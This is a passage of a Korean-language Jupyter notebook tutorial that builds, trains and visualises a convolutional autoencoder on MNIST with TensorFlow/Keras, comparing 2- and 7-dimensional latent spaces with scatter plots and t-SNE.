checking\nprint(train_images[0].shape)\nprint(train_images[0][0][0].dtype)\nprint(train_labels.dtype)", "Downloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/mnist.npz\n11493376/11490434 [==============================] - 0s 0us/step\ntrain_images의 *원래* 데이터의 shape과 dype: (60000, 28, 28) uint8\ntest_images의 *원래* 데이터의 shape과 dype: (10000, 28, 28) uint8\ntrain_images의 *바뀐* 데이터의 shape과 dype: (60000, 28, 28, 1) <dtype: 'float32'>\ntest_images의 *바뀐* 데이터의 shape과 dype: (10000, 28, 28, 1) <dtype: 'float32'>\n(28, 28, 1)\n<dtype: 'float32'>\nuint8\n" ] ], [ [ "## 네트워크 모델 설계\n* 인코더 모델: 케라스 시퀀셜 모델로 설계\n + InputLayer로 (28,28) 영상을 받고, 출력으로 n_dim차원 벡터가 나오도록 함.\n* 디코더 모델: 케라스 시퀀셜 모델로 설계\n + InputLayer에서 n_dim차원 벡터를 받고, 출력으로 (28,28) 영상이 나오도록 함.\n* 오토인코더 모델: 인코더, 디코더를 결합하여 설계\n + 주의: InputLayer를 추가해야 곧장 함수로서 활용할 수 있음.", "_____no_output_____" ], [ "여기서는 n_dim을 우선 2로 설정한다.\n* 즉, n_dim=2", "_____no_output_____" ] ], [ [ "n_dim = 2", "_____no_output_____" ] ], [ [ "인코더 모델 정의\n* (28, 28, 1) 영상을 입력으로 받는 필터가 8개이고, kernel_size가 (2,2)인 Conv2d Layer를 정의한다(padding은 입력과 출력의 크기가 같도록 하기 위해 same을 넣어주었다)\n* Conv2D layer를 통과한 영상 크기를 maxpooling2d layer를 통과시켜 반으로 줄여줍니다.\n* 이것을 두번 반복해줍니다\n + conv2d: (28,28,1) -> (28,28,8)\n + maxpooling2d: (28,28,8) -> (14,14,8)\n + conv2d: (14,14,8) -> (14,14,8)\n + maxpooling2d: (14,14,8) -> (7,7,8)\n* Flatten으로 입력 텐서를 392-vector로 벡터라이즈((7,7,8) -> 7 x 7 x 8 = 392)\n* Fully connected layer로 392 > 128 > 64 > n_dim 로 차원 축소", "_____no_output_____" ] ], [ [ "enc = tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same', input_shape=(28,28,1)),\n tf.keras.layers.MaxPooling2D((2,2), padding='same'),\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),\n tf.keras.layers.MaxPooling2D((2,2), padding='same'),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(64, activation='relu'),\n tf.keras.layers.Dense(n_dim)\n])", "_____no_output_____" ] ], [ [ "디코더 모델 정의\n* Fully connected layey로 n_dim > 64 > 128 > 392로 차원 확대\n* 392-vector를 Reshape을 통해 (7,7,8)의 텐서로 변환\n* 필터가 8이고 kernel_size가 (2,2)인 conv2d layer를 통과시킨다.\n* UpSampling2d를 통과시켜 conv2d layer를 통과한 영상의 크기를 2배로 늘려준다(이것을 2번 반복 시행)\n + conv2d: (7,7,8) -> (7,7,8)\n + upsampling2d: (7,7,8) -> (14,14,8)\n + conv2d: (14,14,8) -> (14,14,8)\n + upsampling2d: (14,14,8) -> (28,28,8)\n* 마지막으로 필터의 개수가 1이고 activation function이 sigmoid인 conv2d layer를 통과 시킨다.\n + conv2d: (28,28,8) -> (28,28,1)", "_____no_output_____" ] ], [ [ "dec = tf.keras.models.Sequential([\n tf.keras.layers.InputLayer(input_shape=(n_dim,)), # 주의: 반드시 1D tensor를 (ndim, )로 표현할 것\n tf.keras.layers.Dense(64, activation='relu'),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(392, activation='relu'),\n tf.keras.layers.Reshape(target_shape=(7,7,8)),\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),\n tf.keras.layers.UpSampling2D((2,2)),\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),\n tf.keras.layers.UpSampling2D((2,2)),\n tf.keras.layers.Conv2D(1, (2,2), activation='sigmoid', padding='same'),\n])", "_____no_output_____" ] ], [ [ "AutoEncoder 모델 정의\n* 인코더 > 디코더로 구성", "_____no_output_____" ] ], [ [ "ae = tf.keras.models.Sequential([\n enc,\n dec, \n])", "_____no_output_____" ] ], [ [ "## 훈련 전, 네트워크 모델을 함수로서 활용\n* AutoEncoder ae를 모델로 구성했기 때문에, 지금부터 함수로서 활용 가능 [(효과적인 TensorFlow: 세션 대신 함수)](https://www.tensorflow.org/guide/effective_tf2?hl=ko#%EC%84%B8%EC%85%98_%EB%8C%80%EC%8B%A0_%ED%95%A8%EC%88%98)\n 
+ 단, ae 함수는 batch 단위로 수행됨을 명심할 것. \n - 단순히, (28, 28, 1) -> ae -> (28, 28, 1)로 동작하지 않고,\n - batch 단위로 (?, 28, 28, 1) -> ae -> (?, 28, 28, 1)로 병렬처리됨.\n* 지금은 훈련 전 네트웍이기 때문에 정상적으로 작동하지 않음.", "_____no_output_____" ] ], [ [ "y_pred = ae(train_images)\nprint('input shape:', train_images.shape)\nprint('output shape:', y_pred.shape)", "input shape: (60000, 28, 28, 1)\noutput shape: (60000, 28, 28, 1)\n" ] ], [ [ "train_images[idx] 영상에 대한 결과 확인\n* ae의 입력 / 출력 가시화\n", "_____no_output_____" ] ], [ [ "import ipywidgets as widgets\n\ndef io_imshow(idx):\n print('GT label:', train_labels[idx])\n plt.subplot(121)\n plt.imshow(train_images[idx,:,:,0])\n plt.subplot(122)\n plt.imshow(y_pred[idx,:,:,0])\n plt.show()\n\nwidgets.interact(io_imshow, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1, continuous_update=False));", "_____no_output_____" ] ], [ [ "## 네트워크 모델 구조 확인\n* summary() 함수로 모델의 구조를 텍스트로 프린트할 수 있음.\n* plot_model() 함수로 모델의 구조를 텍스트로 프린트할 수 있음.", "_____no_output_____" ] ], [ [ "enc.summary()\ntf.keras.utils.plot_model(enc, 'enc.png', show_shapes=True)", "Model: \"sequential\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nconv2d (Conv2D) (None, 28, 28, 8) 40 \n_________________________________________________________________\nmax_pooling2d (MaxPooling2D) (None, 14, 14, 8) 0 \n_________________________________________________________________\nconv2d_1 (Conv2D) (None, 14, 14, 8) 264 \n_________________________________________________________________\nmax_pooling2d_1 (MaxPooling2 (None, 7, 7, 8) 0 \n_________________________________________________________________\nflatten (Flatten) (None, 392) 0 \n_________________________________________________________________\ndense (Dense) (None, 128) 50304 \n_________________________________________________________________\ndense_1 (Dense) (None, 64) 8256 \n_________________________________________________________________\ndense_2 (Dense) (None, 2) 130 \n=================================================================\nTotal params: 58,994\nTrainable params: 58,994\nNon-trainable params: 0\n_________________________________________________________________\n" ], [ "dec.summary()\ntf.keras.utils.plot_model(dec, 'dec.png', show_shapes=True)", "Model: \"sequential_1\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\ndense_3 (Dense) (None, 64) 192 \n_________________________________________________________________\ndense_4 (Dense) (None, 128) 8320 \n_________________________________________________________________\ndense_5 (Dense) (None, 392) 50568 \n_________________________________________________________________\nreshape (Reshape) (None, 7, 7, 8) 0 \n_________________________________________________________________\nconv2d_2 (Conv2D) (None, 7, 7, 8) 264 \n_________________________________________________________________\nup_sampling2d (UpSampling2D) (None, 14, 14, 8) 0 \n_________________________________________________________________\nconv2d_3 (Conv2D) (None, 14, 14, 8) 264 \n_________________________________________________________________\nup_sampling2d_1 (UpSampling2 (None, 28, 28, 8) 0 \n_________________________________________________________________\nconv2d_4 (Conv2D) (None, 28, 28, 1) 33 \n=================================================================\nTotal params: 59,641\nTrainable params: 
59,641\nNon-trainable params: 0\n_________________________________________________________________\n" ], [ "ae.summary()\ntf.keras.utils.plot_model(ae, 'ae.png', show_shapes=True)", "Model: \"sequential_2\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nsequential (Sequential) (None, 2) 58994 \n_________________________________________________________________\nsequential_1 (Sequential) (None, 28, 28, 1) 59641 \n=================================================================\nTotal params: 118,635\nTrainable params: 118,635\nNon-trainable params: 0\n_________________________________________________________________\n" ] ], [ [ "## 오토인코더 인스턴스 트레이닝\n\nAutoEncoder 인스턴스 ae에 대한 훈련 수행\n* 인스턴스 ae를 [compile](https://www.tensorflow.org/api_docs/python/tf/keras/Model#compile)\n + cf) shader program 컴파일과 유사하게 이해해도 됨\n + 이때, 훈련에 활용될 [optimizer](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers), [loss](https://www.tensorflow.org/api_docs/python/tf/keras/losses), [metrics](https://www.tensorflow.org/api_docs/python/tf/keras/metrics) 등을 지정함\n + Optmizer에 대한 이론적 내용은 [이곳](https://brunch.co.kr/@chris-song/50)을 참고하세요.\n* 훈련 데이터 쌍 (train_images, train_labels)으로 fit()을 이용해 훈련 ", "_____no_output_____" ] ], [ [ "ae.compile(optimizer='Adam', # optimizer의 name 혹은 함수 객체 설정\n loss='mse', \n metrics=['mae'])\n\nae.fit(train_images, train_images, epochs=10, batch_size=32)", "Epoch 1/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0593 - mae: 0.1298\nEpoch 2/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0464 - mae: 0.1062\nEpoch 3/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0437 - mae: 0.1012\nEpoch 4/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0424 - mae: 0.0988\nEpoch 5/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0414 - mae: 0.0969\nEpoch 6/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0407 - mae: 0.0956\nEpoch 7/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0402 - mae: 0.0946\nEpoch 8/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0397 - mae: 0.0937\nEpoch 9/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0393 - mae: 0.0930\nEpoch 10/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0390 - mae: 0.0924\n" ] ], [ [ "트레이닝 이후 ae 함수를 다시 수행", "_____no_output_____" ] ], [ [ "y_pred = ae(train_images)", "_____no_output_____" ], [ "import ipywidgets as widgets\n\ndef io_imshow(idx):\n print('GT label:', train_labels[idx])\n plt.subplot(121)\n plt.imshow(train_images[idx,:,:,0])\n plt.subplot(122)\n plt.imshow(y_pred[idx,:,:,0])\n plt.show()\n\nwidgets.interact(io_imshow, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1, continuous_update=False));", "_____no_output_____" ] ], [ [ "## 인코더 / 디코더 모델을 각각 따로 함수로서 활용하기\n다음과 같은 방법으로 트레이닝이 끝난 오토인코더의 enc와 dec를 각각 수행할 수 있다.", "_____no_output_____" ], [ "", "_____no_output_____" ] ], [ [ "z = enc(train_images)\ny_pred = dec(z)", "_____no_output_____" ] ], [ [ "## 인코딩 결과 확인 및 디코딩 결과 확인\n* 특정 이미지에 대한 인코딩 결과를 확인한다.\n* 인코딩 결과와 유사한 좌표값을 디코딩에 보내도 유사한 결과가 나옴을 확인한다.", "_____no_output_____" ] ], [ [ "import ipywidgets as widgets\n\ndef z_show(idx):\n print(z[idx])\n print('GT label:', train_labels[idx])\n\nwidgets.interact(z_show, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1));", 
"_____no_output_____" ] ], [ [ "인코딩 결과와 유사한 좌표값을 디코딩에 보내도 유사한 결과가 나옴을 확인", "_____no_output_____" ] ], [ [ "import ipywidgets as widgets\n\nu=widgets.FloatSlider(min=-5.0, max=5.0)\nv=widgets.FloatSlider(min=-5.0, max=5.0)\n\nui = widgets.HBox([u,v])\n\ndef z_test(u, v):\n z_test = np.array([[u,v]]) \n print(z_test)\n\n img_gen = dec(z_test)\n plt.imshow(img_gen[0,:,:,0])\n plt.show() \n\nout = widgets.interactive_output(z_test, {'u': u, 'v': v})\n\ndisplay(ui, out)", "_____no_output_____" ] ], [ [ "## 인코딩 결과 가시화\n오토인코더의 encoder가 만들어 내는 representation인 z 값을 가시화 한다. ", "_____no_output_____" ] ], [ [ "# 로딩된 MNIST 데이터 가시화\nimport matplotlib.pyplot as plt\n\nz_list = []\nz_list[:] = []\n\nfor i in range(0,10):\n print(\"z_{} :\".format(i), z[train_labels==i].shape)\n z_list.append(z[train_labels == i])\n\ncolors = ['red', 'green', 'blue', 'orange', 'purple', 'brown', 'pink', 'gray', 'olive', 'cyan']\n\nfor z, color in zip(z_list, colors):\n plt.scatter(z[:,0], z[:,1], color = color)\n", "_____no_output_____" ] ], [ [ "## 인코딩 결과 가시화를 통해 알 수 있는 점\n오토인코더의 encoder가 만들어 내는 representation인 z 값을 가시화를 해본 결과 label별로 discriminative한 representation을 만들어내지 못하는 것을 알 수 있다.", "_____no_output_____" ], [ "## 디코더를 이용한 Generative Model 구성", "_____no_output_____" ] ], [ [ "z = np.array([[-1, 0.2], \n [0.5, 0.5], \n [5, -5]\n ])\n\nresult = dec(z)\n\nprint(z.shape)\nprint(result.shape)", "(3, 2)\n(3, 28, 28, 1)\n" ] ], [ [ "결과 가시화\n + [-1, 0.2]는 숫자 8의 분포에 속한다.\n + [0.5, 0.5]는 숫자 6의 분포에 속한다.\n + [5, -5]는 숫자 0의 분포에 속한다.\n* 하지만, 8을 보면 5와 8의 애매한 경계선에 있는 것 같다.\n* 이를 통해, 분포가 겹치는 것을 확인할 수 있다.\n* 이 때문에 condition을 주어 분포가 겹치지 않게 하는 conditional autoencoder가 나오게 되었다.", "_____no_output_____" ] ], [ [ "# 로딩된 MNIST 데이터 가시화\nimport matplotlib.pyplot as plt\n\nplt.subplot(131)\nplt.imshow(result[0,:,:,0])\nplt.subplot(132)\nplt.imshow(result[1,:,:,0])\nplt.subplot(133)\nplt.imshow(result[2,:,:,0])", "_____no_output_____" ] ], [ [ "## 차원 늘리기\nn_dim을 2에서 7로 늘려본다.", "_____no_output_____" ] ], [ [ "n_dim = 7", "_____no_output_____" ] ], [ [ "## 인코딩 모델 정의", "_____no_output_____" ] ], [ [ "enc = tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same', input_shape=(28,28,1)),\n tf.keras.layers.MaxPooling2D((2,2), padding='same'),\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),\n tf.keras.layers.MaxPooling2D((2,2), padding='same'),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(64, activation='relu'),\n tf.keras.layers.Dense(n_dim)\n])", "_____no_output_____" ] ], [ [ "## 디코딩 모델 정의", "_____no_output_____" ] ], [ [ "dec = tf.keras.models.Sequential([\n tf.keras.layers.InputLayer(input_shape=(n_dim,)), # 주의: 반드시 1D tensor를 (ndim, )로 표현할 것\n tf.keras.layers.Dense(64, activation='relu'),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(392, activation='relu'),\n tf.keras.layers.Reshape(target_shape=(7,7,8)),\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),\n tf.keras.layers.UpSampling2D((2,2)),\n tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),\n tf.keras.layers.UpSampling2D((2,2)),\n tf.keras.layers.Conv2D(1, (2,2), activation='sigmoid', padding='same'),\n])", "_____no_output_____" ] ], [ [ "## AutoEncoder 정의", "_____no_output_____" ] ], [ [ "ae = tf.keras.models.Sequential([\n enc,\n dec, \n])", "_____no_output_____" ] ], [ [ "## 네트워크 학습", "_____no_output_____" ] ], [ [ "ae.compile(optimizer='Adam', # optimizer의 name 혹은 함수 객체 설정\n loss='mse', \n 
metrics=['mae'])\n\nae.fit(train_images, train_images, epochs=10, batch_size=32)", "Epoch 1/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0443 - mae: 0.1027\nEpoch 2/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0264 - mae: 0.0672\nEpoch 3/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0238 - mae: 0.0620\nEpoch 4/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0225 - mae: 0.0592\nEpoch 5/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0216 - mae: 0.0575\nEpoch 6/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0210 - mae: 0.0562\nEpoch 7/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0206 - mae: 0.0552\nEpoch 8/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0202 - mae: 0.0544\nEpoch 9/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0199 - mae: 0.0538\nEpoch 10/10\n1875/1875 [==============================] - 6s 3ms/step - loss: 0.0196 - mae: 0.0533\n" ] ], [ [ "## 학습된 결과 확인", "_____no_output_____" ] ], [ [ "y_pred = ae(train_images)", "_____no_output_____" ], [ "import ipywidgets as widgets\n\ndef io_imshow(idx):\n print('GT label:', train_labels[idx])\n plt.subplot(121)\n plt.imshow(train_images[idx,:,:,0])\n plt.subplot(122)\n plt.imshow(y_pred[idx,:,:,0])\n plt.show()\n\nwidgets.interact(io_imshow, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1, continuous_update=False));", "_____no_output_____" ] ], [ [ "## 인코더 결과값 확인", "_____no_output_____" ] ], [ [ "z = enc(train_images)\ny_pred = dec(z)", "_____no_output_____" ], [ "import ipywidgets as widgets\n\ndef z_show(idx):\n print(z[idx])\n print('GT label:', train_labels[idx])\n\nwidgets.interact(z_show, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1));", "_____no_output_____" ] ], [ [ "## TSNE를 통해 인코더 결과값(7,7,8) 분포 가시화\nn_dim이 2일 때보다 좀 더 discriminative한 분포를 갖게 되었다.", "_____no_output_____" ] ], [ [ "from sklearn.manifold import TSNE\n\nmodel = TSNE(learning_rate=100)\ntransformed = model.fit_transform(z)\n\nxs = transformed[:,0]\nys = transformed[:,1]\nplt.scatter(xs,ys,c=train_labels)\n\nplt.show()\n", "_____no_output_____" ] ] ]
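The notebook above inspects reconstructions on the training images only; a minimal sketch of checking the held-out reconstruction error, assuming the trained `ae` and the preprocessed `test_images` tensor from the data-loading cell are still in scope:

```python
# Reconstruction error on the held-out test set; evaluate() returns the
# configured loss (mse) followed by the metric (mae).
test_mse, test_mae = ae.evaluate(test_images, test_images, verbose=0)
print('test mse:', test_mse, '  test mae:', test_mae)
```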
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ] ]
cb1fbf98baa7f613fcf682fa8efd421aeb9ec2f2
157,081
ipynb
Jupyter Notebook
seminar_skript/notebooks.ipynb
nitram-bot/fhnw_lecture
201009fdb695d52db5aa44d8d0e80b52cf9db6c0
[ "Apache-2.0" ]
null
null
null
seminar_skript/notebooks.ipynb
nitram-bot/fhnw_lecture
201009fdb695d52db5aa44d8d0e80b52cf9db6c0
[ "Apache-2.0" ]
2
2021-05-20T13:55:10.000Z
2022-02-26T06:47:34.000Z
seminar_skript/notebooks.ipynb
nitram-bot/fhnw_lecture
201009fdb695d52db5aa44d8d0e80b52cf9db6c0
[ "Apache-2.0" ]
null
null
null
755.197115
151,496
0.948905
[ [ [ "\n# Content with notebooks\n\nYou can also create content with Jupyter Notebooks. This means that you can include\ncode blocks and their outputs in your book.\n\n## Markdown + notebooks\n\nAs it is markdown, you can embed images, HTML, etc into your posts!\n\n![](https://myst-parser.readthedocs.io/en/latest/_static/logo.png)\n![](logo.png)\n\nYou can also $add_{math}$ and\n\n$$\nmath^{blocks}\n$$\n\nor\n\n$$\n\\begin{aligned}\n\\mbox{mean} la_{tex} \\\\ \\\\\nmath blocks\n\\end{aligned}\n$$\n\nBut make sure you \\$Escape \\$your \\$dollar signs \\$you want to keep!\n\n## MyST markdown\n\nMyST markdown works in Jupyter Notebooks as well. For more information about MyST markdown, check\nout [the MyST guide in Jupyter Book](https://jupyterbook.org/content/myst.html),\nor see [the MyST markdown documentation](https://myst-parser.readthedocs.io/en/latest/).\n\n## Code blocks and outputs\n\nJupyter Book will also embed your code blocks and output in your book.\nFor example, here's some sample Matplotlib code:", "_____no_output_____" ] ], [ [ "from matplotlib import rcParams, cycler\nimport matplotlib.pyplot as plt\nimport numpy as np\nplt.ion()", "_____no_output_____" ], [ "# Fixing random state for reproducibility\nnp.random.seed(19680801)\n\nN = 10\ndata = [np.logspace(0, 1, 100) + np.random.randn(100) + ii for ii in range(N)]\ndata = np.array(data).T\ncmap = plt.cm.coolwarm\nrcParams['axes.prop_cycle'] = cycler(color=cmap(np.linspace(0, 1, N)))\n\n\nfrom matplotlib.lines import Line2D\ncustom_lines = [Line2D([0], [0], color=cmap(0.), lw=4),\n Line2D([0], [0], color=cmap(.5), lw=4),\n Line2D([0], [0], color=cmap(1.), lw=4)]\n\nfig, ax = plt.subplots(figsize=(10, 5))\nlines = ax.plot(data)\nax.legend(custom_lines, ['Cold', 'Medium', 'Hot']);", "_____no_output_____" ] ], [ [ "There is a lot more that you can do with outputs (such as including interactive outputs)\nwith your book. For more information about this, see [the Jupyter Book documentation](https://jupyterbook.org)", "_____no_output_____" ], [ "Next, we can include the constant term $a$ into the vector $b$. This is done by adding an all-ones column to $\\mathbf{X}$: \n \n\\begin{equation*}\n \\begin{bmatrix}\n y_1\\\\\n y_2\\\\\n . \\\\\n . \\\\\n . \\\\\n y_i\n \\end{bmatrix}\n =\n \\begin{bmatrix}\n 1& x_{11} & x_{21} & x_{31} & \\ldots & x_{p1}\\\\\n 1 & x_{12} & x_{22} & x_{32} & \\ldots & x_{p2}\\\\\n &\\ldots&\\ldots&\\ldots&\\ldots&\\ldots\\\\\n &\\ldots&\\ldots&\\ldots&\\ldots&\\ldots\\\\\n 1& x_{1i} & x_{2i} & x_{3i} & \\ldots & x_{pi}\n \\end{bmatrix}\n \\cdot\n \\begin{bmatrix}\n a\\\\\n b_1\\\\\n b_2\\\\\n .\\\\\n .\\\\\n b_p\n \\end{bmatrix}\n\\end{equation*}", "_____no_output_____" ], [ "\\begin{align*}\n y_1&=a+b_1\\cdot x_{11}+b_2\\cdot x_{21}+\\cdots + b_p\\cdot x_{p1}\\\\\n y_2&=a+b_1\\cdot x_{12}+b_2\\cdot x_{22}+\\cdots + b_p\\cdot x_{p2}\\\\\n \\ldots& \\ldots\\\\\n y_i&=a+b_1\\cdot x_{1i}+b_2\\cdot x_{2i}+\\cdots + b_p\\cdot x_{pi}\\\\\n\\end{align*}", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ] ]
cb1fcb6f693a93ca4699f82cbdfcd38e20cfc314
71,495
ipynb
Jupyter Notebook
synthetic_datasets/model.ipynb
dzianissokalau/data_generator
20776e7b96a2600c6efa5417b9f02ea42b7e881a
[ "MIT" ]
null
null
null
synthetic_datasets/model.ipynb
dzianissokalau/data_generator
20776e7b96a2600c6efa5417b9f02ea42b7e881a
[ "MIT" ]
null
null
null
synthetic_datasets/model.ipynb
dzianissokalau/data_generator
20776e7b96a2600c6efa5417b9f02ea42b7e881a
[ "MIT" ]
null
null
null
39.434639
145
0.536919
[ [ [ "import numpy as np\nfrom datetime import datetime, timedelta\nimport time", "_____no_output_____" ], [ "# some probabilities should be dynamics, for example:\n# buying probability depends on the number of available items\n# listing probability increases if user has sold something in the past\n# probability of churn increases if user hasn't listed + hasn't bought anything + doesn't have anything in the basket\n# instead of using random choise for time, we should use distribution (exponential, binomial, normal etc)\nevents = {\n 'visit': {\n 'condition': True,\n 'inputs': 'timestamp',\n 'time': [0, 20],\n 'next_events': ['search', 'list_item', 'do_nothing'],\n 'probabilities': [0.6, 0.05, 0.35]\n },\n 'create_account': {\n 'time': [30, 150],\n 'next_events': ['search', 'list_item', 'do_nothing'],\n 'probabilities': [0.8, 0.1, 0.1] \n },\n 'list_item': {\n 'conditions': ['registered'],\n 'time': [90, 300],\n 'next_events': ['search', 'list_item', 'do_nothing'],\n 'probabilities': [0.1, 0.3, 0.6] \n },\n 'search': {\n 'time': [10, 120],\n 'next_events': ['search', 'view_item', 'list_item', 'do_nothing'],\n 'probabilities': [0.35, 0.5, 0.01, 0.14] \n },\n 'view_item': {\n 'time': [10, 30],\n 'next_events': ['view_item', 'send_message', 'search', 'add_to_basket', 'list_item', 'do_nothing'],\n 'probabilities': [0.4, 0.1, 0.2, 0.1, 0.01, 0.19] \n },\n 'send_message': {\n 'conditions': ['registered'],\n 'time': [10, 30],\n 'next_events': ['view_item', 'search', 'add_to_basket', 'do_nothing'],\n 'probabilities': [0.5, 0.25, 0.05, 0.2] \n },\n 'read_message': {\n 'conditions': ['n_unread_messages > 0'],\n 'time': [1, 10],\n 'next_events': ['answer', 'search', 'list_item', 'do_nothing'],\n 'probabilities': [0.8, 0.1, 0.01, 0.09] \n }, \n 'answer': {\n 'conditions': ['n_read_messages > 0'],\n 'time': [5, 120],\n 'next_events': ['search', 'list_item', 'do_nothing'],\n 'probabilities': [0.3, 0.01, 0.69] \n }, \n 'add_to_basket': {\n 'conditions': ['registered'],\n 'time': [5, 120],\n 'next_events': ['search', 'view_item', 'open_basket', 'do_nothing'],\n 'probabilities': [0.2, 0.2, 0.45, 0.15] \n },\n 'open_basket': {\n 'conditions': ['n_items_in_basket > 0'],\n 'time': [5, 120],\n 'next_events': ['search', 'remove_from_basket', 'pay', 'list_item', 'do_nothing'],\n 'probabilities': [0.05, 0.35, 0.45, 0.01, 0.15] \n },\n 'remove_from_basket': {\n 'conditions': ['n_items_in_basket > 0'],\n 'time': [1, 20],\n 'next_events': ['search', 'remove_from_basket', 'pay', 'do_nothing'],\n 'probabilities': [0.2, 0.2, 0.2, 0.4] \n },\n 'pay': {\n 'conditions': ['registered', 'n_items_in_basket > 0'],\n 'time': [180, 1800],\n 'next_events': ['search', 'do_nothing'],\n 'probabilities': [0.1, 0.9] \n },\n 'do_nothing': {}\n}", "_____no_output_____" ], [ "def create_event_data(event_name, user_id, timestamp, properties=None):\n d = {\n 'event_name': event_name,\n 'user_id': user_id,\n 'timestamp': timestamp\n }\n \n if properties is not None:\n for p in properties.keys():\n d[p] = properties\n \n return d", "_____no_output_____" ], [ "users = dict()\nitems = dict()\nmessages = dict()", "_____no_output_____" ], [ "class Item:\n def __init__(self, item_id, lister_id, listing_date):\n self.item_id = item_id\n self.lister_id = lister_id\n self.listing_date = listing_date\n self.status = 'active'\n \n\n \n\nclass Message:\n def __init__(self, sender_id, recepient_id, message_id, timestamp):\n self.sender_id = sender_id\n self.recepient_id = recepient_id\n self.message_id = message_id\n self.timestamp = timestamp", 
"_____no_output_____" ], [ "current_date = datetime(2021,4,18,23,10,11)", "_____no_output_____" ], [ "class User:\n def __init__(self, name, user_id):\n self.name = name\n self.user_id = user_id\n self.registered = False\n\n \n \n satisfaction_impact = {\n 'registration': 10,\n 'message_sent': 1,\n 'message_read': 1,\n 'list_item': 10,\n 'purchase': 20,\n 'sale': 20,\n 'delete_item': -20,\n 'days_listed': -1,\n 'search': -1,\n 'item_view': -1\n }\n \n \n \n @property\n def visit_probability(self):\n \"\"\"Calculate visit_probability as combination of initial probability and satisfaction level and other factor.\n \"\"\"\n probability_visit_from_satisfaction = 0.01 + self.satisfaction / 1000\n \n if probability_visit_from_satisfaction < 0:\n probability_visit_from_satisfaction = 0\n elif probability_visit_from_satisfaction > 0.05:\n probability_visit_from_satisfaction = 0.05\n \n probability_visit_from_messages = self.n_unread_messages * 0.2\n \n if probability_visit_from_messages > 0.6:\n probability_visit_from_messages = 0.6\n \n probability_visit_total = probability_visit_from_satisfaction + probability_visit_from_messages\n\n return probability_visit_total\n \n \n \n @property\n def satisfaction(self):\n \"\"\"Calculate user satisfaction level.\n \"\"\"\n satisfaction = 0\n \n if self.registered:\n satisfaction += self.satisfaction_impact['registration']\n \n if hasattr(self, 'messages_sent'):\n satisfaction += self.n_messages_sent * self.satisfaction_impact['message_sent']\n\n if hasattr(self, 'messages_read'):\n satisfaction += self.n_messages_read * self.satisfaction_impact['message_read']\n\n if hasattr(self, 'n_listed_items'):\n satisfaction += self.n_listed_items * self.satisfaction_impact['list_item'] \n \n if hasattr(self, 'n_purchases'):\n satisfaction += self.n_purchases * self.satisfaction_impact['purchase'] \n \n if hasattr(self, 'n_sold_items'):\n satisfaction += self.n_sold_items * self.satisfaction_impact['sale'] \n\n if hasattr(self, 'item_views'):\n satisfaction += self.item_views * self.satisfaction_impact['item_view'] \n \n if hasattr(self, 